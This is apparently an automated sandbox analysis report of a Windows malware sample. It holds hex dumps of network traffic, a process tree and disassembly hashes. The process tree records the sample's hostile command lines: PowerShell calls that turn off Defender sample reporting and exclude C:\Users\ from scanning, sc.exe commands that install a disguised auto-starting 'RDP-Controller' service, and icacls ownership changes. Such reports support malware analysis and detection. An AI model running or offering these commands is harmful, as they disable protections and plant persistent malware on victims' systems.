2024-10-12 18:32:05 UTC	16320	IN	Data Raw: 32 ca 31 d4 0d 4b b1 b0 b5 66 cd 4c ad 28 30 b0 e5 32 34 37 b2 30 35 31 b3 b4 b4 80 08 19 62 0a 19 c1 84 cc 4d 8c 8c ad 99 33 33 0c 6c 75 02 02 4a 0c 23 0d c2 9d dc 2c 02 0a dd 0a 23 8c 2b cd cd cb 32 92 7c 2c 8b 2c 8a 0d 8d 8c 73 c2 75 ab fc bc f3 7d f2 9d 13 7d f3 6d 41 5a 0c 6d 75 8a 2d 22 32 bd 82 7d cd 0a cc 12 d3 7d 0d 4d 4a 4b f2 d3 0d 53 03 c2 bc 33 a3 7c 75 f3 b3 3c b3 0d d3 4a 0d 3c 22 d3 5c 4a 9d 3c c1 5a 8c 6c 75 0c 52 52 4d c2 02 9d 72 bd b2 dc fd fc f2 22 fd 73 33 8d 33 23 7d 4c d2 bd 0a 22 cc b3 9d 43 83 9c 3c 0c 02 aa d2 82 2b 5c f2 23 41 3e 2a 49 4c 07 f9 c8 d8 d8 dc d2 d4 dc c0 d2 0c 22 04 f2 91 85 a1 85 85 b1 a1 99 91 31 44 c8 c8 96 d3 cc d2 cc d0 c8 d8 d8 c0 00 1c 17 75 26 b9 61 99 16 ce c9 85 e5 41 15 c5 16 be 9e ae 85 05 a1 81 a6 c9 Data Ascii: 21KfL(0247051bM33luJ#,#+2\|,,su}}mAZmu-"2}}MJKS3\|u<J<"\J<ZluRRMr"s33#}L"C<+\#A>*IL"1Du&aA
2024-10-12 18:32:05 UTC	16320	IN	Data Raw: 99 2f dc 51 ae c7 9f ef 5f 3b ff f7 2b 3f bd ac 5e f8 31 f9 e1 1f 02 77 1f 3e f6 db 0f 97 9f ba f9 e7 a5 75 45 8a ff 13 00 00 ff ff 50 4b 07 08 3e 6d 2f 6c fe 02 00 00 8d 04 00 00 50 4b 03 04 14 00 08 00 08 00 70 3c 4a 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 58 52 2d 52 75 73 4b 66 4c 6f 6b 46 6d 62 4c 54 4b 41 30 6c 54 6e 44 64 4a 61 45 71 34 34 67 72 70 31 63 72 66 4c 59 43 65 36 45 3d 2e 64 61 74 55 54 05 00 01 c5 83 07 67 5a 27 b3 51 cf 25 6c 6d 8f d4 11 3b 3b d7 6b e6 5b bd 8c 17 70 1c b4 f3 8a 39 10 75 34 6e 93 43 ad c7 34 89 94 94 e8 7f 4b 4f be bc 76 e3 fb f2 6e eb ef d7 1f 2d e9 7c 38 cd 67 95 66 db 9e cf 37 75 2d 23 47 e5 f1 cb 2b cf 77 5b b6 32 eb c8 8d 02 e1 47 c1 99 6d 2b 79 82 ac 7e 48 b3 09 2f fb Data Ascii: /Q_;+?^1w>uEPK>m/lPKp<JY;routerInfo-XR-RusKfLokFmbLTKA0lTnDdJaEq44grp1crfLYCe6E=.datUTgZ'Q%lm;;k[p9u4nC4KOvn-\|8gf7u-#G+w[2Gm+y~H/
2024-10-12 18:32:05 UTC	11160	IN	Data Raw: dd 14 9f 14 0b 2c 6e 2c 0e 4c ae c8 2a c9 0b c8 73 75 f6 0d 2e 4f 09 aa f0 0c cd af 8c f4 29 2f 72 49 49 2f 70 8f 0c ac 73 cf 35 4f 31 71 0f c9 76 83 bb 91 81 41 07 ea ac 80 20 6b d6 bc d4 12 cf 14 90 30 5f 51 7e 69 49 6a 91 5e 59 6a 51 71 66 7e 9e 2d 9b 81 9e a5 9e 99 b1 f5 59 9b 56 c3 c9 ec 87 7f 95 15 a6 bb c7 1e 59 14 a6 f3 62 5a 8f bc dc ca f5 bf 34 ce e7 30 56 6d 55 8d e7 53 7d bc f6 98 de 02 b5 a9 af c3 3e 2f ab 58 90 e1 7c 3d 55 e8 ec c3 9b 9e d9 31 4f d9 c3 4e b0 03 02 00 00 ff ff 50 4b 07 08 03 6a c7 55 de 01 00 00 2a 03 00 00 50 4b 03 04 14 00 08 08 08 00 11 3c 4a 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 33 79 51 54 4e 61 35 6d 69 61 30 39 7a 4c 4a 41 5a 54 47 62 4b 62 53 7a 33 63 49 59 7e 38 39 7e 47 Data Ascii: ,n,Lsu.O)/rII/ps5O1qvA k0_Q~iIj^YjQqf~-YVYbZ40VmUS}>/X\|=U1ONPKjUPK<JY;routerInfo-3yQTNa5mia09zLJAZTGbKbSz3cIY~89~G
2024-10-12 18:32:05 UTC	10220	IN	Data Raw: 38 4e 6f 36 6d 4c 55 61 43 75 77 4a 36 46 2d 32 4d 46 77 6b 51 64 51 66 4d 5a 56 6c 6f 6c 76 74 64 4f 6d 35 51 51 37 38 51 3d 2e 64 61 74 55 54 05 00 01 04 86 07 67 01 00 00 ff ff 50 4b 07 08 00 00 00 00 05 00 00 00 00 00 00 00 50 4b 03 04 14 00 08 00 08 00 33 3e 4a 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 63 36 7a 50 50 62 4b 69 53 2d 47 43 35 2d 31 45 69 35 57 5a 48 47 72 59 39 49 6a 67 6c 6f 6b 6d 36 30 6f 61 45 75 4b 52 32 68 73 3d 2e 64 61 74 55 54 05 00 01 12 87 07 67 ec d1 cd 6b 13 69 1c 07 f0 c9 36 69 b7 85 ed 6e 77 61 f7 d4 5d e8 61 2f 9b b4 cf cc 33 6f 61 76 d0 c4 8c cd 9b c9 64 26 69 5e 04 e3 34 93 26 93 64 f2 36 79 57 42 3d 58 85 1e 0a d5 43 03 be 80 07 6d 0f 96 ea cd 16 a4 42 a9 67 ab 22 f4 22 e6 20 Data Ascii: 8No6mLUaCuwJ6F-2MFwkQdQfMZVlolvtdOm5QQ78Q=.datUTgPKPK3>JY;routerInfo-c6zPPbKiS-GC5-1Ei5WZHGrY9Ijglokm60oaEuKR2hs=.datUTgki6inwa]a/3oavd&i^4&d6yWB=XCmBg""
2024-10-12 18:32:05 UTC	14600	IN	Data Raw: 4b 03 04 14 00 08 00 08 00 62 3d 4a 59 00 00 00 00 00 00 00 00 00 00 00 00 3b 00 09 00 72 6f 75 74 65 72 49 6e 66 6f 2d 63 38 6a 34 46 5a 79 47 45 57 34 75 75 30 52 52 57 53 63 2d 56 52 68 64 53 58 43 5a 71 63 66 73 79 30 69 48 68 45 35 6a 75 79 73 3d 2e 64 61 74 55 54 05 00 01 88 85 07 67 9a 27 34 e7 8d a4 d4 0d 8b 22 0f 3e fd 89 22 2a 72 1f 9f 6d 0d d7 7a e5 9d b9 de fa 48 f0 87 ed 1b 19 cd 6d f8 d7 cb c8 3c 8b b7 6d 7d ea a7 7d 51 8a 23 ea de 63 b6 ab cc ac d5 b1 32 ab 7f 9f bd 26 6c 3a 2a 8f 5f fe 4d e4 ff 27 97 ff 9e f1 e2 cb e2 6e 9f 7a 4c 39 68 d3 b5 37 97 76 ad 9d d6 95 78 e6 a9 07 c3 f9 88 c5 ac 0c 2c 0c ec 0c 2c 0c 0c 8c 93 4a 13 e7 fe 60 62 66 80 02 56 bf 10 e7 00 23 86 52 96 8c fc e2 12 5b 5e 4b 43 3d 23 63 23 3d 23 23 53 3d 13 53 6b c6 4c 5b Data Ascii: Kb=JY;routerInfo-c8j4FZyGEW4uu0RRWSc-VRhdSXCZqcfsy0iHhE5juys=.datUTg'4">"rmzHm<m}}Q#c2&l:_M'nzL9h7vx,,J`bfV#R[^KC=#c#=##S=SkL[
2024-10-12 18:32:05 UTC	6331	IN	Data Raw: 37 af e2 0c 02 00 00 61 03 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 be 92 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 38 30 7a 55 32 59 54 39 49 57 65 50 47 77 5a 58 42 32 44 76 50 41 76 32 57 59 41 66 4c 59 73 6d 38 6c 35 34 41 69 56 30 35 44 59 3d 2e 64 61 74 55 54 05 00 01 70 85 07 67 50 4b 01 02 14 00 14 00 08 08 08 00 f1 38 4a 59 ae 09 d9 5d 07 04 00 00 09 05 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 3c 95 00 00 72 6f 75 74 65 72 49 6e 66 6f 2d 6d 7a 4a 74 43 48 55 4e 6a 43 33 4b 49 66 31 50 46 66 33 63 74 33 51 54 4e 53 55 69 4c 38 30 57 33 6e 7e 75 6a 75 34 52 32 49 49 3d 2e 64 61 74 55 54 05 00 01 37 7d 07 67 50 4b 01 02 14 00 14 00 08 08 08 00 ad 39 4a 59 7b 66 4b 95 26 02 00 00 94 04 00 00 3b 00 09 00 00 00 00 00 00 00 00 00 00 00 b5 99 Data Ascii: 7a;routerInfo-80zU2YT9IWePGwZXB2DvPAv2WYAfLYsm8l54AiV05DY=.datUTpgPK8JY];<routerInfo-mzJtCHUNjC3KIf1PFf3ct3QTNSUiL80W3n~uju4R2II=.datUT7}gPK9JY{fK&;

Target ID:	0
Start time:	14:29:59
Start date:	12/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x400000
File size:	5'654'528 bytes
MD5 hash:	D2ECF5F2A271DA094867F6DC31B3D60E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	14:29:59
Start date:	12/10/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0x400000
File size:	5'654'528 bytes
MD5 hash:	D2ECF5F2A271DA094867F6DC31B3D60E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	14:30:02
Start date:	12/10/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\system32\cmd.exe" /k "C:\Users\user\AppData\Local\Temp\frdnii7m0pblld98fxhpnx.bat"
Imagebase:	0x7ff76ac70000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	14:30:02
Start date:	12/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	14:30:02
Start date:	12/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoLogo -Command "Set-MpPreference -SubmitSamplesConsent NeverSend"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	14:30:02
Start date:	12/10/2024
Path:	C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\f8ff311483bvmdq2bvv.exe"
Imagebase:	0x7ff66eba0000
File size:	98'304 bytes
MD5 hash:	319865D78CC8DF6270E27521B8182BFF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 3%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	14:30:06
Start date:	12/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoLogo -Command "Set-MpPreference -MAPSReporting 0"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	14:30:08
Start date:	12/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	powershell.exe -NoLogo -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	14:30:14
Start date:	12/10/2024
Path:	C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\Temp\31yd7ynpdj6jw5vl4xn9qyj7u.exe"
Imagebase:	0x7ff7a70c0000
File size:	10'639'360 bytes
MD5 hash:	7D1755E8E41A6C2F08D2FAEFFDF9DAD1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 42%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	14:30:17
Start date:	12/10/2024
Path:	C:\Windows\System32\taskkill.exe
Wow64 process (32bit):	false
Commandline:	taskkill.exe /F /FI "SERVICES eq RDP-Controller"
Imagebase:	0x7ff6d59d0000
File size:	101'376 bytes
MD5 hash:	A599D3B2FAFBDE4C1A6D7D0F839451C7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	14:30:17
Start date:	12/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	14:30:17
Start date:	12/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc.exe stop RDP-Controller
Imagebase:	0x7ff712840000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	14:30:17
Start date:	12/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	14:30:18
Start date:	12/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc.exe create RDP-Controller binpath= C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe type= own start= auto error= ignore
Imagebase:	0x7ff712840000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	14:30:18
Start date:	12/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	14:30:18
Start date:	12/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc.exe failure RDP-Controller reset= 1 actions= restart/10000
Imagebase:	0x7ff712840000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	14:30:18
Start date:	12/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	14:30:18
Start date:	12/10/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc.exe start RDP-Controller
Imagebase:	0x7ff712840000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	14:30:18
Start date:	12/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	14:30:18
Start date:	12/10/2024
Path:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Imagebase:	0x7ff70cad0000
File size:	89'088 bytes
MD5 hash:	4E320E2F46342D6D4657D2ADBF1F22D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 67%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	14:30:18
Start date:	12/10/2024
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls.exe C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\ /setowner *S-1-5-18
Imagebase:	0x7ff768000000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	14:30:18
Start date:	12/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	14:30:18
Start date:	12/10/2024
Path:	C:\Windows\System32\icacls.exe
Wow64 process (32bit):	false
Commandline:	icacls.exe C:\Users\Public /restore C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\95cRhCj4pPDP.acl
Imagebase:	0x7ff768000000
File size:	39'424 bytes
MD5 hash:	48C87E3B3003A2413D6399EA77707F5D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	14:30:18
Start date:	12/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	14:30:43
Start date:	12/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	31
Start time:	14:31:10
Start date:	12/10/2024
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0x7ff7403e0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	32
Start time:	14:31:10
Start date:	12/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -pss -s 452 -p 5252 -ip 5252
Imagebase:	0x7ff66bfc0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	14:31:10
Start date:	12/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 5252 -s 1184
Imagebase:	0x7ff66bfc0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	14:31:24
Start date:	12/10/2024
Path:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe
Imagebase:	0x7ff70cad0000
File size:	89'088 bytes
MD5 hash:	4E320E2F46342D6D4657D2ADBF1F22D0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	14:31:47
Start date:	12/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -pss -s 520 -p 5164 -ip 5164
Imagebase:	0x7ff66bfc0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	14:31:47
Start date:	12/10/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 5164 -s 1112
Imagebase:	0x7ff66bfc0000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 02B99D02 Relevance: 4.8, APIs: 3, Instructions: 340COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 02B9A05F
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 02B9A065
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 02B9A06B

Memory Dump Source

Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b90000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: a3f64ff64f7b7f31477b65388417927e1dcf11656a0d7e8d81c602991d1e7496
Instruction ID: c10bbc5163ba51729200dd879f8e6a6cdd68d67bfa4fff8a0e76901c47562742
Opcode Fuzzy Hash: a3f64ff64f7b7f31477b65388417927e1dcf11656a0d7e8d81c602991d1e7496
Instruction Fuzzy Hash: A9B17C70918E4C8FCB54EF28C884A9AB7E1FFA9304F50576AE88AD3265DB309481CB41

Function 02B9CDB2 Relevance: 3.3, APIs: 2, Instructions: 338COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 02B9D0F7
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 02B9D0FD

Memory Dump Source

Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b90000_file.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID:
API String ID: 3668304517-0
Opcode ID: 34fbf8e30838d51e21bf191a2d090dd1966248fe052b2782dafca8ee0236092f
Instruction ID: 43c51016baad8b8728b6a5a454ec9c9151c4fd7b9e1ccead1e181afca0f535f9
Opcode Fuzzy Hash: 34fbf8e30838d51e21bf191a2d090dd1966248fe052b2782dafca8ee0236092f
Instruction Fuzzy Hash: 8BA1A231928F4C8BDB54EF2CD8856EA77E2FB99350F10576AE88AC3154DB30D581CB81

Function 02B94B56 Relevance: 1.8, APIs: 1, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 647ee9b534975270aca972dac79fdea6b0120ab65a008a00e97fa6d470cd0a4c
Instruction ID: 735053c5885d932743fd5f3816bbfea34b45d784af0717c341d0268c9a1e8d15
Opcode Fuzzy Hash: 647ee9b534975270aca972dac79fdea6b0120ab65a008a00e97fa6d470cd0a4c
Instruction Fuzzy Hash: 0EA1A331618E0C8FCF58EF2CD4856ADB7F2FFA9314B0046AAD44AD7255DA30E946CB85

Function 02BAD132 Relevance: 1.8, APIs: 1, Instructions: 321COMMON

Download Yara Rule

APIs

_clrfp.LIBCMT ref: 02BAD381

Memory Dump Source

Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b90000_file.jbxd

Similarity

API ID: _clrfp
String ID:
API String ID: 3618594692-0
Opcode ID: 9f5802e7a3bba20555b21e1936248732c444238cb055604f1a421cdc6350789e
Instruction ID: 998e501469d19ab4c1ae4d2d320e50a5a39aeb87842ca0392bfa099b8e7a7f75
Opcode Fuzzy Hash: 9f5802e7a3bba20555b21e1936248732c444238cb055604f1a421cdc6350789e
Instruction Fuzzy Hash: 8AB16930614B4E8FDB99CF1CC89AB6677E0FF49308F188599E899CB661C335E852CB01

Function 02B97F3A Relevance: .4, Instructions: 446COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af3f5e58f1e42435f7da6adc6adac8f31d32a2d35e1c63632e3e7cc02981b94a
Instruction ID: d1bff17bc3e8c6ed43cc613ab6befb6674f3d1ce8e744fa0d34d4bf1f3a44c56
Opcode Fuzzy Hash: af3f5e58f1e42435f7da6adc6adac8f31d32a2d35e1c63632e3e7cc02981b94a
Instruction Fuzzy Hash: 84E16431928B4C8BCB49DF68C8946BAB3E1FFA9300F50576EE486D3155EB74E644CB81

Function 02BA702E Relevance: .2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 884b2154e67faba7e97d33cdef9cdf909460de4ff3516825797b00cb977ca7ac
Instruction ID: 3e2354cca5a3e8d9562ad22d359fcdae41f3c7b614a20f7ed173775ddb636358
Opcode Fuzzy Hash: 884b2154e67faba7e97d33cdef9cdf909460de4ff3516825797b00cb977ca7ac
Instruction Fuzzy Hash: 6361F570A1CF5C4FDB28EF28985916EBBE5FB85710F14469FE886C3155DF70A8428AC2

Function 02BA53FA Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2128977555.0000000002B90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2b90000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fd267f5a20fc586d5f6155ebbd5ebefe49e40c3b4699dbf32c941d6f4a047b0
Instruction ID: 1f9c43d445cb8492df69a90005cc8a0f65cb21ee0c01472946382032bfecd63c
Opcode Fuzzy Hash: 2fd267f5a20fc586d5f6155ebbd5ebefe49e40c3b4699dbf32c941d6f4a047b0
